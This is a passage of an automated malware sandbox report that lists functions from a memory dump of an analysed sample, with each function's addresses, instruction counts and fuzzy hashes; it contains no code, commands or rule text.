                                                                                                                    • Instruction ID: 9ce218baf291c48bbf3f88d10eb1f7910fde3f74425b2eaab9f20e24ce311b40
                                                                                                                    • Opcode Fuzzy Hash: d8eba5ddc68a8b7d83553ef58bbd58df50d9b377f72bb929ef518446ce4c2afe
                                                                                                                    • Instruction Fuzzy Hash: B171E232200B01AFF732EF18CA45F6ABBB6EF40724F144528E25A8B2A1D775E944CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F8AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f2197d65215abaaf3c7566be5b58738856c4dc3294f8b35902b6d9c23ce3ecc2
                                                                                                                    • Instruction ID: 02edc6a789d25dd7bd5c597f28ac368d56654329ddbf2970a2bbde14f08f8ea5
                                                                                                                    • Opcode Fuzzy Hash: f2197d65215abaaf3c7566be5b58738856c4dc3294f8b35902b6d9c23ce3ecc2
                                                                                                                    • Instruction Fuzzy Hash: 7C81E176A08306DFDB64CF98D484BADBBF5BF48B21F15412EDA04AB281C7349D41CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2CDB1 Relevance: .2, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: be33ea5ac583e0df2c954d07cb39555b852e17a5754b63f50a7c92faf7ea8ea6
                                                                                                                    • Instruction ID: 900e82c055ef43437f1b796ec2c09757fc24c6e1b900e6962db5cb56a5494886
                                                                                                                    • Opcode Fuzzy Hash: be33ea5ac583e0df2c954d07cb39555b852e17a5754b63f50a7c92faf7ea8ea6
                                                                                                                    • Instruction Fuzzy Hash: FC61C0B1A00316DFCB19DF68C980BAEB7B9FF18324F15416AEA11EB295D7359901CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AAA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3730aa51d1dab6383af799ab4baa7643ae46495410cc5fb9498c83a13be2892e
                                                                                                                    • Instruction ID: 2d8bef418766d6e95a5be3163789ca8de99b907c24029343ec5d7fdde294b1a7
                                                                                                                    • Opcode Fuzzy Hash: 3730aa51d1dab6383af799ab4baa7643ae46495410cc5fb9498c83a13be2892e
                                                                                                                    • Instruction Fuzzy Hash: 1151C072504712AFD722DE68C944F6BBBE8EBC9750F400929BA81DB150D770ED08CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AB8DAE Relevance: .2, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fa3ec9d1f953772c223e56ec11f7a190e966f2cbf2e9c2bf8f0ab3170260a890
                                                                                                                    • Instruction ID: f7340cd71a1dd9e7d6a024663f4fbbca87671c020d4e82cddb671af0f12f93a0
                                                                                                                    • Opcode Fuzzy Hash: fa3ec9d1f953772c223e56ec11f7a190e966f2cbf2e9c2bf8f0ab3170260a890
                                                                                                                    • Instruction Fuzzy Hash: DE51B2B16047429FD712DF28C880BAAB7EDFF94350F04892CF98597292D738D909CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A98350 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a538f9c2ef8cb56555f24661841af82856846862b04c2f98f7fb69fe2479f63b
                                                                                                                    • Instruction ID: e21989a9c5c25e37406e69b7930f957cd71c153820525d6d3eb18dccd6a825d3
                                                                                                                    • Opcode Fuzzy Hash: a538f9c2ef8cb56555f24661841af82856846862b04c2f98f7fb69fe2479f63b
                                                                                                                    • Instruction Fuzzy Hash: 9151E170900709DFDB21CF6AC980BABFBF8BF95710F10461EE292976A1C774A585CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 7170bb9f356cd5b8d74098386c3bd189f32eb5f17f0df54768b559d78e1e9c06
                                                                                                                    • Instruction ID: f60dfa1e3374b1158200025f4cbecfa7848e08beb5df3ac13ab2c85a06be3db8
                                                                                                                    • Opcode Fuzzy Hash: 7170bb9f356cd5b8d74098386c3bd189f32eb5f17f0df54768b559d78e1e9c06
                                                                                                                    • Instruction Fuzzy Hash: D9516971200A15DFCB22EF69CA80EAAB3FDFF58784F44042AE556D7261E734E985CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A94180 Relevance: .2, Instructions: 156COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12ebb5f9c6f688fbd8061ea955c806d4f181a2760e35977a775e9fc85a098d86
                                                                                                                    • Instruction ID: 80baf0dceb25a8d069cf5adc641552cf5ce19a2ab108801bd13037cf781e0bc0
                                                                                                                    • Opcode Fuzzy Hash: 12ebb5f9c6f688fbd8061ea955c806d4f181a2760e35977a775e9fc85a098d86
                                                                                                                    • Instruction Fuzzy Hash: 515168716083029FDB54DF29CA81A6BBBE5FFC8218F444A2DF599C7250EB30D946CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A145B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                    • Instruction ID: 2c422c25b8a181dabbd07e5812ba45c146981e11bae0fad714a15b217a71356d
                                                                                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                    • Instruction Fuzzy Hash: B5518071E0421AAFDF15DF98C540BFEBBB9AF49754F044169EA01AB244E734DD44CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A7E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                    • Instruction ID: 2690ed59c4933a30945733c25ad99a6a70242dbdfbbca273a5312cdf1753f523
                                                                                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                    • Instruction Fuzzy Hash: BB51B531D0020AEFEF219F94CD84BBEBF79EB84365F1586A5E61267190D7309F448BA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AB8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d93924381f736dcb566dcfc328dbb595cef1d33d2bbcbe71f5b43ed3be59961
                                                                                                                    • Instruction ID: 8594e073a402a3fc02e96d24c7b5a3eb26b235f37683505b183de900a00669ca
                                                                                                                    • Opcode Fuzzy Hash: 3d93924381f736dcb566dcfc328dbb595cef1d33d2bbcbe71f5b43ed3be59961
                                                                                                                    • Instruction Fuzzy Hash: 6B41E8B07016819BD729DB2DC9D4BFFBB9EEF91620F088119E959C7282DB3CD801C691
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A7CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a24f8c5d4a7011857189fcdf4374ddec6fb50603d68009082d57e39a8459408b
                                                                                                                    • Instruction ID: 8be5e0dc7294ab42f2a2726354b9b69d1cfd60414154c121646634e824c571b1
                                                                                                                    • Opcode Fuzzy Hash: a24f8c5d4a7011857189fcdf4374ddec6fb50603d68009082d57e39a8459408b
                                                                                                                    • Instruction Fuzzy Hash: D251BC7590021ADFCB21DFA9C980AAEBBF9FF58324F154919D509A7309E734AE01CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 243e08214cc11d69c46b8686937108a229d0a34b2eeadbd59a56ee3a0a4fdcb0
                                                                                                                    • Instruction ID: 04a31cbb7bc266fc5746b4995e33ce6c05e3f8350e099af4b195b687c6c21024
                                                                                                                    • Opcode Fuzzy Hash: 243e08214cc11d69c46b8686937108a229d0a34b2eeadbd59a56ee3a0a4fdcb0
                                                                                                                    • Instruction Fuzzy Hash: 314124797403229BCF2AEF6DA980B6B37B9AB54718F05003DED069F246D7B1DC018790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01ABA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                    • Instruction ID: b6fb47df3327cfc6dccf39b2c47f8447061ffb342a146ebc4510f18d44212588
                                                                                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                    • Instruction Fuzzy Hash: 5A41D571600756AFD725CF28C9C4AAAB7ADFF80210F05862EE95287642EB31ED08C790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A201F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e75572f4c257f18b76aea80cf5f118dcb583166c80ae03b4a8956350e9db661
                                                                                                                    • Instruction ID: fcf8e7518bdf6b4a00fb6fba6d3406b9343691890f4f57b9b8cc6106fff45cc3
                                                                                                                    • Opcode Fuzzy Hash: 5e75572f4c257f18b76aea80cf5f118dcb583166c80ae03b4a8956350e9db661
                                                                                                                    • Instruction Fuzzy Hash: 9F41BB35900229DBDB14DFACC640AEEBBB9BF59710F19822AF915E7240D735AC41CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A1EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4165e6f7d77f79e285c704837d909f230694badcf5d03a83cc4deaa6d3926747
                                                                                                                    • Instruction ID: bd6a67be8cc78cc3033841dad306fd56afbea54dd6aa02a62f4085ff651d23f5
                                                                                                                    • Opcode Fuzzy Hash: 4165e6f7d77f79e285c704837d909f230694badcf5d03a83cc4deaa6d3926747
                                                                                                                    • Instruction Fuzzy Hash: A541C3726043029FD726DF28C984A67B7F9FF88318F04482AE957C7255EB35E8498B90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32750 Relevance: .1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                    • Instruction ID: 2dd67735d2ed077dbf511cd8c8b7d1515d8c6fb59fdc0f298e8525bc360fd759
                                                                                                                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                    • Instruction Fuzzy Hash: 11515975A00215CFCB15CF9CC984AAEF7B6FF84710F2881A9D915A7355D770AE82CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F6154 Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 791a2f05521b4cc66916e210af81f7a8ec44921005749219c9a648d59a20d774
                                                                                                                    • Instruction ID: 7469d3c24a28bea671e7ce7ff186e3ccd9d14b15da9f4abcf179766cf914d8ea
                                                                                                                    • Opcode Fuzzy Hash: 791a2f05521b4cc66916e210af81f7a8ec44921005749219c9a648d59a20d774
                                                                                                                    • Instruction Fuzzy Hash: 2B51D470A04216EBDB268B28CD04BE9BBB5FF11314F1482A9E62DD72D1D7349981CF80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F0BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: af518561480a9806b7680064bff4273f711a336d200db21c928fa353d2fd03b4
                                                                                                                    • Instruction ID: acffae57c472a5b0e25ed2a30ad993a3d501004bb0c09f828750e115378a2db8
                                                                                                                    • Opcode Fuzzy Hash: af518561480a9806b7680064bff4273f711a336d200db21c928fa353d2fd03b4
                                                                                                                    • Instruction Fuzzy Hash: A641A471E002299FDB21DF68C940FEA77B9BF85750F0500A9E948AB242D7749E84CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AB866E Relevance: .1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                    • Instruction ID: d5751d10a65fa4ae7ef6c2870d10154028356e422e3439cfd7f4ec23943e0e6f
                                                                                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                    • Instruction Fuzzy Hash: B241A475B10185ABDB15DF9DCDD4AEFBBBEAF84604F144069E500D7342D678DD408B60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F0887 Relevance: .1, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3242712ffc07eb46e740031409a2c9621004dde54611203d98d30da781ae5184
                                                                                                                    • Instruction ID: f6eb84596f076b44e5cb13314bd7a6ea0a56fbd96e71f439058f1c71e493dd3f
                                                                                                                    • Opcode Fuzzy Hash: 3242712ffc07eb46e740031409a2c9621004dde54611203d98d30da781ae5184
                                                                                                                    • Instruction Fuzzy Hash: E141D571600702AFE725CF28C580A26B7FEFF48314B184A6DE64B87652E731F885CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A1A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e66c7892b50efe82833a777174041fa11b4350ffc98f2afd6e8ab2af1237c87
                                                                                                                    • Instruction ID: 405098b9ab22d41b2beb499c88af1cb62aab105ee8f1ec4343b7d33023ca93d9
                                                                                                                    • Opcode Fuzzy Hash: 7e66c7892b50efe82833a777174041fa11b4350ffc98f2afd6e8ab2af1237c87
                                                                                                                    • Instruction Fuzzy Hash: 1D41023294A245CFDF21DF68D5847EDBBF5FF18B60F084155D411AB289DB349901CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F8BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b9fc058d102c9594dee906646e8789a8fbd46f141bc1a5a606569b9451efe6df
                                                                                                                    • Instruction ID: b25aa80c5fa530c035a0a28666d052a64ee8ca79d0d9dcb7629784e890df2527
                                                                                                                    • Opcode Fuzzy Hash: b9fc058d102c9594dee906646e8789a8fbd46f141bc1a5a606569b9451efe6df
                                                                                                                    • Instruction Fuzzy Hash: 0741F376D00206EBDB699F48C880B5ABBF9FF98B14F15812EDA059F256C735D842CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019E8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1bbebba0497085ef6c8e8e4c23853da977dbc86b48ec5d9cfe7c371dc45b7757
                                                                                                                    • Instruction ID: 06e4652b424084bf297e71ef4359aef3b4f2b377fa8fbe8368145db7f5f5dbc7
                                                                                                                    • Opcode Fuzzy Hash: 1bbebba0497085ef6c8e8e4c23853da977dbc86b48ec5d9cfe7c371dc45b7757
                                                                                                                    • Instruction Fuzzy Hash: 0F416B359087069FD312DF69C940A6BB7E9FF88B54F40092AF984D7250E730DE458BA3
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019EA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                    • Instruction ID: cd9f12fa0b88d72e8c252dc0563e18142b9c823af97427b120e841a7dd3c6e0c
                                                                                                                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                    • Instruction Fuzzy Hash: ED413B31A04211DFDB12DF69C448BBABFB1EBD1756F15806AE94D8B250D636DD40CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F09AD Relevance: .1, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce57392db1586d5f3234933cb79d7fa108c3d9a3d9bf3ecbd878f7be36161031
                                                                                                                    • Instruction ID: 1cdb9eabd6f79b746011de89235f2860203c682bd6b432b37e0165159fb9173e
                                                                                                                    • Opcode Fuzzy Hash: ce57392db1586d5f3234933cb79d7fa108c3d9a3d9bf3ecbd878f7be36161031
                                                                                                                    • Instruction Fuzzy Hash: 1B416A71600701EFD722DF28D840B26BBE9FF54315F248A2EE5498B292E771E9468B90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A20710 Relevance: .1, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                    • Instruction ID: 4b842f8ebbe47f6dc2e84073fa7efd707a0d208327e457c93a5e099b7eccf4f6
                                                                                                                    • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
